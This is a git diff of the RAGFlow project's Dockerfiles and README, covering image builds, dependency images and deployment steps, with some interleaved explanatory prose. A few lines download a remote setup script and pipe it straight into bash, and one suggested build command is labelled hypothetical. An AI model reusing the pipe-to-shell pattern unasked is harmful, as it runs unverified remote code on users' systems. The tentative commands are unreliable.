+    ln -s /opt/chrome/chrome /usr/local/bin/
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/chromedriver-linux64-121-0-6167-85,target=/chromedriver-linux64.zip \
+    unzip -j /chromedriver-linux64.zip chromedriver-linux64/chromedriver && \
+    mv chromedriver /usr/local/bin/ && \
+    rm -f /usr/bin/google-chrome
+
+# https://forum.aspose.com/t/aspose-slides-for-net-no-usable-version-of-libssl-found-with-linux-server/271344/13
+# aspose-slides on linux/arm64 is unavailable
+RUN --mount=type=bind,from=infiniflow/ragflow_deps:latest,source=/,target=/deps \
+    if [ "$(uname -m)" = "x86_64" ]; then \
+        dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_amd64.deb; \
+    elif [ "$(uname -m)" = "aarch64" ]; then \
+        dpkg -i /deps/libssl1.1_1.1.1f-1ubuntu2_arm64.deb; \
+    fi
+
+
+# builder stage
+FROM base AS builder
+USER root
+
+WORKDIR /ragflow
+
+# install dependencies from uv.lock file
+COPY pyproject.toml uv.lock ./
+
+# https://github.com/astral-sh/uv/issues/10462
+# uv records index url into uv.lock but doesn't failover among multiple indexes
+RUN --mount=type=cache,id=ragflow_uv,target=/root/.cache/uv,sharing=locked \
+    if [ "$NEED_MIRROR" == "1" ]; then \
+        sed -i 's|pypi.org|mirrors.aliyun.com/pypi|g' uv.lock; \
+    else \
+        sed -i 's|mirrors.aliyun.com/pypi|pypi.org|g' uv.lock; \
+    fi; \
+    if [ "$LIGHTEN" == "1" ]; then \
+        uv sync --python 3.10 --frozen; \
+    else \
+        uv sync --python 3.10 --frozen --all-extras; \
+    fi
+
+COPY web web
+COPY docs docs
+RUN --mount=type=cache,id=ragflow_npm,target=/root/.npm,sharing=locked \
+    cd web && npm install && npm run build
+
+COPY .git /ragflow/.git
+
+RUN version_info=$(git describe --tags --match=v* --first-parent --always); \
+    if [ "$LIGHTEN" == "1" ]; then \
+        version_info="$version_info slim"; \
+    else \
+        version_info="$version_info full"; \
+    fi; \
+    echo "RAGFlow version: $version_info"; \
+    echo $version_info > /ragflow/VERSION
+
+# production stage
+FROM base AS production
+USER root
+
+WORKDIR /ragflow
+
+# Copy Python environment and packages
+ENV VIRTUAL_ENV=/ragflow/.venv
+COPY --from=builder ${VIRTUAL_ENV} ${VIRTUAL_ENV}
+ENV PATH="${VIRTUAL_ENV}/bin:${PATH}"
+
+ENV PYTHONPATH=/ragflow/
+
+COPY web web
+COPY api api
+COPY conf conf
+COPY deepdoc deepdoc
+COPY rag rag
+COPY agent agent
+COPY graphrag graphrag
+COPY agentic_reasoning agentic_reasoning
+COPY pyproject.toml uv.lock ./
+COPY mcp mcp
+COPY plugin plugin
+
+COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
+COPY docker/entrypoint.sh ./
+RUN chmod +x ./entrypoint*.sh
+
+# Copy compiled web pages
+COPY --from=builder /ragflow/web/dist /ragflow/web/dist
+
+COPY --from=builder /ragflow/VERSION /ragflow/VERSION
+ENTRYPOINT ["./entrypoint.sh"]

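Both workflows above drive this file with the same two build arguments, so the two image variants can be built locally with the commands below (mirrored from tests.yml; NEED_MIRROR=1 only helps when building behind the Chinese mirrors):

    # full image, including the bundled embedding models
    docker build --progress=plain -f Dockerfile -t infiniflow/ragflow:nightly .
    # slim image: LIGHTEN=1 skips bge-large-zh-v1.5 and bce-embedding-base_v1
    docker build --progress=plain --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
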
@@ -1,25 +0,0 @@
-FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
-USER root
-
-WORKDIR /ragflow
-
-## for cuda > 12.0
-RUN /root/miniconda3/envs/py11/bin/pip uninstall -y onnxruntime-gpu
-RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
-
-
-ADD ./web ./web
-RUN cd ./web && npm i && npm run build
-
-ADD ./api ./api
-ADD ./conf ./conf
-ADD ./deepdoc ./deepdoc
-ADD ./rag ./rag
-
-ENV PYTHONPATH=/ragflow/
-ENV HF_ENDPOINT=https://hf-mirror.com
-
-ADD docker/entrypoint.sh ./entrypoint.sh
-RUN chmod +x ./entrypoint.sh
-
-ENTRYPOINT ["./entrypoint.sh"]

Dockerfile.deps (new file): 10 added lines

@@ -0,0 +1,10 @@
+# This builds an image that contains the resources needed by Dockerfile
+#
+FROM scratch
+
+# Copy resources downloaded via download_deps.py
+COPY chromedriver-linux64-121-0-6167-85 chrome-linux64-121-0-6167-85 cl100k_base.tiktoken libssl1.1_1.1.1f-1ubuntu2_amd64.deb libssl1.1_1.1.1f-1ubuntu2_arm64.deb tika-server-standard-3.0.0.jar tika-server-standard-3.0.0.jar.md5 libssl*.deb /
+
+COPY nltk_data /nltk_data
+
+COPY huggingface.co /huggingface.co

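This scratch image is the infiniflow/ragflow_deps:latest that the main Dockerfile bind-mounts for its model and dependency copies. A plausible local build sequence, assuming download_deps.py drops the artifacts into the build context (check the script itself for its exact invocation):

    python3 download_deps.py    # hypothetical invocation; fetches models, tika, chrome, libssl debs
    docker build -f Dockerfile.deps -t infiniflow/ragflow_deps:latest .
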
@@ -1,54 +0,0 @@
-FROM ubuntu:22.04
-USER root
-
-WORKDIR /ragflow
-
-RUN apt-get update && apt-get install -y wget curl build-essential libopenmpi-dev
-
-RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
-    bash ~/miniconda.sh -b -p /root/miniconda3 && \
-    rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
-    echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
-    echo "conda activate base" >> ~/.bashrc
-
-ENV PATH /root/miniconda3/bin:$PATH
-
-RUN conda create -y --name py11 python=3.11
-
-ENV CONDA_DEFAULT_ENV py11
-ENV CONDA_PREFIX /root/miniconda3/envs/py11
-ENV PATH $CONDA_PREFIX/bin:$PATH
-
-RUN curl -sL https://deb.nodesource.com/setup_14.x | bash -
-RUN apt-get install -y nodejs
-
-RUN apt-get install -y nginx
-
-ADD ./web ./web
-ADD ./api ./api
-ADD ./conf ./conf
-ADD ./deepdoc ./deepdoc
-ADD ./rag ./rag
-ADD ./requirements.txt ./requirements.txt
-
-RUN apt install openmpi-bin openmpi-common libopenmpi-dev
-ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
-RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
-RUN cd ./web && npm i && npm run build
-RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
-
-RUN apt-get update && \
-    apt-get install -y libglib2.0-0 libgl1-mesa-glx && \
-    rm -rf /var/lib/apt/lists/*
-
-RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ ollama
-RUN conda run -n py11 python -m nltk.downloader punkt
-RUN conda run -n py11 python -m nltk.downloader wordnet
-
-ENV PYTHONPATH=/ragflow/
-ENV HF_ENDPOINT=https://hf-mirror.com
-
-ADD docker/entrypoint.sh ./entrypoint.sh
-RUN chmod +x ./entrypoint.sh
-
-ENTRYPOINT ["./entrypoint.sh"]

@@ -1,56 +1,61 @@
 FROM opencloudos/opencloudos:9.0
 USER root

 WORKDIR /ragflow

 RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel

 RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
     bash ~/miniconda.sh -b -p /root/miniconda3 && \
     rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
     echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
     echo "conda activate base" >> ~/.bashrc

 ENV PATH /root/miniconda3/bin:$PATH

 RUN conda create -y --name py11 python=3.11

 ENV CONDA_DEFAULT_ENV py11
 ENV CONDA_PREFIX /root/miniconda3/envs/py11
 ENV PATH $CONDA_PREFIX/bin:$PATH

 # RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
 RUN dnf install -y nodejs

 RUN dnf install -y nginx

 ADD ./web ./web
 ADD ./api ./api
+ADD ./docs ./docs
 ADD ./conf ./conf
 ADD ./deepdoc ./deepdoc
 ADD ./rag ./rag
 ADD ./requirements.txt ./requirements.txt
+ADD ./agent ./agent
+ADD ./graphrag ./graphrag
+ADD ./plugin ./plugin

 RUN dnf install -y openmpi openmpi-devel python3-openmpi
 ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
 ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
 RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
 RUN cd ./web && npm i && npm run build
 RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
 RUN conda run -n py11 pip install redis

 RUN dnf update -y && \
     dnf install -y glib2 mesa-libGL && \
     dnf clean all

 RUN conda run -n py11 pip install ollama
 RUN conda run -n py11 python -m nltk.downloader punkt
 RUN conda run -n py11 python -m nltk.downloader wordnet

 ENV PYTHONPATH=/ragflow/
 ENV HF_ENDPOINT=https://hf-mirror.com

+COPY docker/service_conf.yaml.template ./conf/service_conf.yaml.template
 ADD docker/entrypoint.sh ./entrypoint.sh
 RUN chmod +x ./entrypoint.sh

 ENTRYPOINT ["./entrypoint.sh"]

609
README.md
609
README.md
@ -1,203 +1,406 @@
|
|||||||
<div align="center">
|
<div align="center">
|
||||||
<a href="https://demo.ragflow.io/">
|
<a href="https://demo.ragflow.io/">
|
||||||
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
|
||||||
</a>
|
</a>
|
||||||
</div>
|
</div>
|
||||||
|
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<a href="./README.md">English</a> |
|
<a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DBEDFA"></a>
|
||||||
<a href="./README_zh.md">简体中文</a> |
|
<a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
|
||||||
<a href="./README_ja.md">日本語</a>
|
<a href="./README_tzh.md"><img alt="繁體版中文自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
|
||||||
</p>
|
<a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
|
||||||
|
<a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
|
||||||
<p align="center">
|
<a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
|
||||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
<a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
|
||||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
</p>
|
||||||
</a>
|
|
||||||
<a href="https://demo.ragflow.io" target="_blank">
|
<p align="center">
|
||||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
<a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
|
||||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
<img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
|
||||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
|
</a>
|
||||||
alt="docker pull infiniflow/ragflow:v0.3.2"></a>
|
<a href="https://demo.ragflow.io" target="_blank">
|
||||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
|
||||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
</a>
|
||||||
</a>
|
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||||
</p>
|
<img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
|
||||||
|
</a>
|
||||||
## 💡 What is RAGFlow?
|
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||||
|
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||||
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
</a>
|
||||||
|
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||||
## 🌟 Key Features
|
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||||
|
</a>
|
||||||
### 🍭 **"Quality in, quality out"**
|
<a href="https://deepwiki.com/infiniflow/ragflow">
|
||||||
|
<img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
|
||||||
- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
|
</a>
|
||||||
- Finds "needle in a data haystack" of literally unlimited tokens.
|
</p>
|
||||||
|
|
||||||
### 🍱 **Template-based chunking**
|
<h4 align="center">
|
||||||
|
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||||
- Intelligent and explainable.
|
<a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
|
||||||
- Plenty of template options to choose from.
|
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||||
|
<a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
|
||||||
### 🌱 **Grounded citations with reduced hallucinations**
|
<a href="https://demo.ragflow.io">Demo</a>
|
||||||
|
</h4>
|
||||||
- Visualization of text chunking to allow human intervention.
|
|
||||||
- Quick view of the key references and traceable citations to support grounded answers.
|
#
|
||||||
|
|
||||||
### 🍔 **Compatibility with heterogeneous data sources**
|
<div align="center">
|
||||||
|
<a href="https://trendshift.io/repositories/9064" target="_blank"><img src="https://trendshift.io/api/badge/repositories/9064" alt="infiniflow%2Fragflow | Trendshift" style="width: 250px; height: 55px;" width="250" height="55"/></a>
|
||||||
- Supports Word, slides, excel, txt, images, scanned copies, structured data, web pages, and more.
|
</div>
|
||||||
|
|
||||||
### 🛀 **Automated and effortless RAG workflow**
|
<details open>
|
||||||
|
<summary><b>📕 Table of Contents</b></summary>
|
||||||
- Streamlined RAG orchestration catered to both personal and large businesses.
|
|
||||||
- Configurable LLMs as well as embedding models.
|
- 💡 [What is RAGFlow?](#-what-is-ragflow)
|
||||||
- Multiple recall paired with fused re-ranking.
|
- 🎮 [Demo](#-demo)
|
||||||
- Intuitive APIs for seamless integration with business.
|
- 📌 [Latest Updates](#-latest-updates)
|
||||||
|
- 🌟 [Key Features](#-key-features)
|
||||||
## 📌 Latest Features
|
- 🔎 [System Architecture](#-system-architecture)
|
||||||
|
- 🎬 [Get Started](#-get-started)
|
||||||
- 2024-04-19 Support conversation API ([detail](./docs/conversation_api.md)).
|
- 🔧 [Configurations](#-configurations)
|
||||||
- 2024-04-16 Add an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding).
|
- 🔧 [Build a docker image without embedding models](#-build-a-docker-image-without-embedding-models)
|
||||||
- 2024-04-16 Add [FastEmbed](https://github.com/qdrant/fastembed), which is designed specifically for light and speedy embedding.
|
- 🔧 [Build a docker image including embedding models](#-build-a-docker-image-including-embedding-models)
|
||||||
- 2024-04-11 Support [Xinference](./docs/xinference.md) for local LLM deployment.
|
- 🔨 [Launch service from source for development](#-launch-service-from-source-for-development)
|
||||||
- 2024-04-10 Add a new layout recognization model for analyzing Laws documentation.
|
- 📚 [Documentation](#-documentation)
|
||||||
- 2024-04-08 Support [Ollama](./docs/ollama.md) for local LLM deployment.
|
- 📜 [Roadmap](#-roadmap)
|
||||||
- 2024-04-07 Support Chinese UI.
|
- 🏄 [Community](#-community)
|
||||||
|
- 🙌 [Contributing](#-contributing)
|
||||||
## 🔎 System Architecture
|
|
||||||
|
</details>
## 💡 What is RAGFlow?

[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLMs (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex-format data.

## 🎮 Demo

Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
</div>
## 🔥 Latest Updates

- 2025-08-01 Supports agentic workflows.
- 2025-05-23 Adds a Python/JavaScript code executor component to Agent.
- 2025-05-05 Supports cross-language queries.
- 2025-03-19 Supports using a multi-modal model to make sense of images within PDF or DOCX files.
- 2025-02-28 Combined with Internet search (Tavily), supports Deep Research-style reasoning for any LLM.
- 2024-12-18 Upgrades the document layout analysis model in DeepDoc.
- 2024-08-22 Supports text-to-SQL through RAG.

## 🎉 Stay Tuned

⭐️ Star our repository to stay up to date with exciting new features and improvements! Get instant notifications for new releases! 🌟

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
</div>
## 🌟 Key Features

### 🍭 **"Quality in, quality out"**

- [Deep document understanding](./deepdoc/README.md)-based knowledge extraction from unstructured data with complicated formats.
- Finds the "needle in a data haystack" across virtually unlimited tokens.

### 🍱 **Template-based chunking**

- Intelligent and explainable.
- Plenty of template options to choose from.

### 🌱 **Grounded citations with reduced hallucinations**

- Visualization of text chunking to allow human intervention.
- Quick view of the key references and traceable citations to support grounded answers.

### 🍔 **Compatibility with heterogeneous data sources**

- Supports Word, slides, Excel, txt, images, scanned copies, structured data, web pages, and more.

### 🛀 **Automated and effortless RAG workflow**

- Streamlined RAG orchestration catering to both individuals and large enterprises.
- Configurable LLMs as well as embedding models.
- Multiple recall paired with fused re-ranking.
- Intuitive APIs for seamless integration with business systems.

## 🔎 System Architecture

<div align="center" style="margin-top:20px;margin-bottom:20px;">
<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
</div>
## 🎬 Get Started

### 📝 Prerequisites

- CPU >= 4 cores
- RAM >= 16 GB
- Disk >= 50 GB
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
- [gVisor](https://gvisor.dev/docs/user_guide/install/): Required only if you intend to use the code executor (sandbox) feature of RAGFlow.

> [!TIP]
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
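If you want to confirm the prerequisites before proceeding, a quick check might look like this (a minimal sketch; version strings and free resources will differ on your machine):

```bash
# Confirm Docker and the Compose plugin meet the minimum versions above:
docker --version          # expect >= 24.0.0
docker compose version    # expect >= v2.26.1
# Check available memory and disk space (Linux):
free -g
df -h .
```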
### 🚀 Start up the server

1. Ensure `vm.max_map_count` >= 262144:

> To check the value of `vm.max_map_count`:
>
> ```bash
> $ sysctl vm.max_map_count
> ```
>
> Reset `vm.max_map_count` to a value of at least 262144 if it is not:
>
> ```bash
> # In this case, we set it to 262144:
> $ sudo sysctl -w vm.max_map_count=262144
> ```
>
> This change will be reset after a system reboot. To ensure your change remains permanent, add or update the `vm.max_map_count` value in **/etc/sysctl.conf** accordingly:
>
> ```bash
> vm.max_map_count=262144
> ```
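To apply the **/etc/sysctl.conf** change without waiting for a reboot, you can reload the file and re-check the value (a sketch; assumes a Linux host):

```bash
# Reload kernel parameters from /etc/sysctl.conf, then verify:
sudo sysctl -p
sysctl vm.max_map_count
```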
2. Clone the repo:

```bash
$ git clone https://github.com/infiniflow/ragflow.git
```
3. Start up the server using the pre-built Docker images:

> [!CAUTION]
> All Docker images are built for x86 platforms. We don't currently offer Docker images for ARM64.
> If you are on an ARM64 platform, follow [this guide](https://ragflow.io/docs/dev/build_docker_image) to build a Docker image compatible with your system.

> The command below downloads the `v0.20.0-slim` edition of the RAGFlow Docker image. See the following table for descriptions of the different RAGFlow editions. To download a RAGFlow edition other than `v0.20.0-slim`, update the `RAGFLOW_IMAGE` variable accordingly in **docker/.env** before using `docker compose` to start the server (see the excerpt after the table). For example: set `RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0` for the full edition `v0.20.0`.

```bash
$ cd ragflow/docker
# Use CPU for embedding and DeepDoc tasks:
$ docker compose -f docker-compose.yml up -d

# To use GPU to accelerate embedding and DeepDoc tasks:
# docker compose -f docker-compose-gpu.yml up -d
```

| RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
|-------------------|-----------------|-----------------------|--------------------------|
| v0.20.0           | ≈9              | :heavy_check_mark:    | Stable release           |
| v0.20.0-slim      | ≈2              | ❌                    | Stable release           |
| nightly           | ≈9              | :heavy_check_mark:    | _Unstable_ nightly build |
| nightly-slim      | ≈2              | ❌                    | _Unstable_ nightly build |
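For instance, switching from the slim edition to the full edition could look like this in **docker/.env** (a sketch of the relevant excerpt; the surrounding contents of the file vary by release):

```bash
# docker/.env (excerpt) — keep exactly one RAGFLOW_IMAGE line active:
# RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0-slim
RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0
```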
4. Check the server status after having the server up and running:

```bash
$ docker logs -f ragflow-server
```

_The following output confirms a successful launch of the system:_

```bash
     ____   ___    ______ ______ __
    / __ \ /   |  / ____// ____// /____  _      __
   / /_/ // /| | / / __ / /_   / // __ \| | /| / /
  / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
 /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/

 * Running on all addresses (0.0.0.0)
```
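If you prefer a scripted readiness check over tailing the logs, polling the web port until it responds is one option (a sketch; it assumes the default port 80 on the local machine):

```bash
# Poll RAGFlow's default HTTP port until it answers:
until curl -sSf -o /dev/null http://127.0.0.1/; do
  echo "RAGFlow is not ready yet; retrying in 5 s..."
  sleep 5
done
echo "RAGFlow is up."
```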
> If you skip this confirmation step and log in to RAGFlow directly, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.

5. In your web browser, enter the IP address of your server and log in to RAGFlow.

> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number), as the default HTTP serving port `80` can be omitted when using the default configurations.

6. In [service_conf.yaml.template](./docker/service_conf.yaml.template), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.

> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.

_The show is on!_
## 🔧 Configurations

When it comes to system configurations, you will need to manage the following files:

- [.env](./docker/.env): Keeps the fundamental setups for the system, such as `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, and `MINIO_PASSWORD`.
- [service_conf.yaml.template](./docker/service_conf.yaml.template): Configures the back-end services. The environment variables in this file are automatically populated when the Docker container starts. Any environment variables set within the Docker container are available for use, allowing you to customize service behavior based on the deployment environment.
- [docker-compose.yml](./docker/docker-compose.yml): The system relies on [docker-compose.yml](./docker/docker-compose.yml) to start up.

> The [./docker/README](./docker/README.md) file provides a detailed description of the environment settings and service configurations, which can be used as `${ENV_VARS}` in the [service_conf.yaml.template](./docker/service_conf.yaml.template) file.

To update the default HTTP serving port (80), go to [docker-compose.yml](./docker/docker-compose.yml) and change `80:80` to `<YOUR_SERVING_PORT>:80`.

Updates to the above configurations require a reboot of all containers to take effect:

> ```bash
> $ docker compose -f docker-compose.yml up -d
> ```
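Since [service_conf.yaml.template](./docker/service_conf.yaml.template) is populated from the container's environment, one way to sanity-check which values it will receive is to inspect that environment directly (a sketch; the container name and variable names are the defaults mentioned above):

```bash
# List the environment variables the template is rendered from:
docker exec ragflow-server env | grep -E 'SVR_HTTP_PORT|MYSQL|MINIO'
```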
### Switch doc engine from Elasticsearch to Infinity

RAGFlow uses Elasticsearch by default for storing full text and vectors. To switch to [Infinity](https://github.com/infiniflow/infinity/), follow these steps:

1. Stop all running containers:

```bash
$ docker compose -f docker/docker-compose.yml down -v
```

> [!WARNING]
> `-v` will delete the docker container volumes, and the existing data will be cleared.

2. Set `DOC_ENGINE` in **docker/.env** to `infinity` (see the excerpt below).
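The change itself is a one-line edit (a sketch of the relevant excerpt; the default engine name is an assumption, and the rest of **docker/.env** stays untouched):

```bash
# docker/.env (excerpt) — select the document engine:
# DOC_ENGINE=elasticsearch
DOC_ENGINE=infinity
```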
3. Start the containers:

```bash
$ docker compose -f docker-compose.yml up -d
```

> [!WARNING]
> Switching to Infinity on a Linux/arm64 machine is not yet officially supported.
## 🔧 Build a Docker image without embedding models

This image is approximately 2 GB in size and relies on external LLM and embedding services.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
```

## 🔧 Build a Docker image including embedding models

This image is approximately 9 GB in size. As it includes embedding models, it relies on external LLM services only.

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
```
## 🔨 Launch service from source for development

1. Install uv and pre-commit, or skip this step if they are already installed:

```bash
pipx install uv pre-commit
```

2. Clone the source code and install Python dependencies:

```bash
git clone https://github.com/infiniflow/ragflow.git
cd ragflow/
uv sync --python 3.10 --all-extras  # install RAGFlow dependent python modules
uv run download_deps.py
pre-commit install
```

3. Launch the dependent services (MinIO, Elasticsearch, Redis, and MySQL) using Docker Compose:

```bash
docker compose -f docker/docker-compose-base.yml up -d
```

Add the following line to `/etc/hosts` to resolve all hosts specified in **docker/.env** to `127.0.0.1`:

```
127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
```
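To confirm the aliases resolve locally after editing `/etc/hosts`, you can query a few of them (a sketch; `getent` is available on most Linux systems):

```bash
# Each alias should map to 127.0.0.1:
getent hosts es01 mysql minio redis
```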
4. If you cannot access HuggingFace, set the `HF_ENDPOINT` environment variable to use a mirror site:

```bash
export HF_ENDPOINT=https://hf-mirror.com
```

5. If your operating system does not have jemalloc, install it as follows:

```bash
# Ubuntu
sudo apt-get install libjemalloc-dev
# CentOS
sudo yum install jemalloc
```

6. Launch the backend service:

```bash
source .venv/bin/activate
export PYTHONPATH=$(pwd)
bash docker/launch_backend_service.sh
```
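Once the script is running, the API server should be listening on port 9380 (the address shown in the startup banner earlier); a quick probe could look like this (a sketch, assuming the default port):

```bash
# Check that the backend answers on the default API port:
curl -s -o /dev/null -w "%{http_code}\n" http://127.0.0.1:9380/
```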
7. Install frontend dependencies:

```bash
cd web
npm install
```

8. Launch the frontend service:

```bash
npm run dev
```

_The following output confirms a successful launch of the system:_

![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)

9. Stop the RAGFlow front-end and back-end services after development is complete:

```bash
pkill -f "ragflow_server.py|task_executor.py"
```
## 📚 Documentation

- [Quickstart](https://ragflow.io/docs/dev/)
- [Configuration](https://ragflow.io/docs/dev/configurations)
- [Release notes](https://ragflow.io/docs/dev/release_notes)
- [User guides](https://ragflow.io/docs/dev/category/guides)
- [Developer guides](https://ragflow.io/docs/dev/category/developers)
- [References](https://ragflow.io/docs/dev/category/references)
- [FAQs](https://ragflow.io/docs/dev/faq)

## 📜 Roadmap

See the [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214).

## 🏄 Community

- [Discord](https://discord.gg/NjYzJD3GM3)
- [Twitter](https://twitter.com/infiniflowai)
- [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)

## 🙌 Contributing

RAGFlow flourishes via open-source collaboration. In this spirit, we embrace diverse contributions from the community. If you would like to be a part of it, review our [Contribution Guidelines](https://ragflow.io/docs/dev/contributing) first.
# README_id.md (new file)
<div align="center">
<a href="https://demo.ragflow.io/">
<img src="web/src/assets/logo-with-text.png" width="520" alt="ragflow logo">
</a>
</div>

<p align="center">
  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
  <a href="./README_zh.md"><img alt="README in Simplified Chinese" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
  <a href="./README_tzh.md"><img alt="README in Traditional Chinese" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
  <a href="./README_ja.md"><img alt="README in Japanese" src="https://img.shields.io/badge/日本語-DFE0E5"></a>
  <a href="./README_ko.md"><img alt="README in Korean" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
  <a href="./README_id.md"><img alt="README in Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DBEDFA"></a>
  <a href="./README_pt_br.md"><img alt="README in Portuguese (Brazil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
</p>

<p align="center">
    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
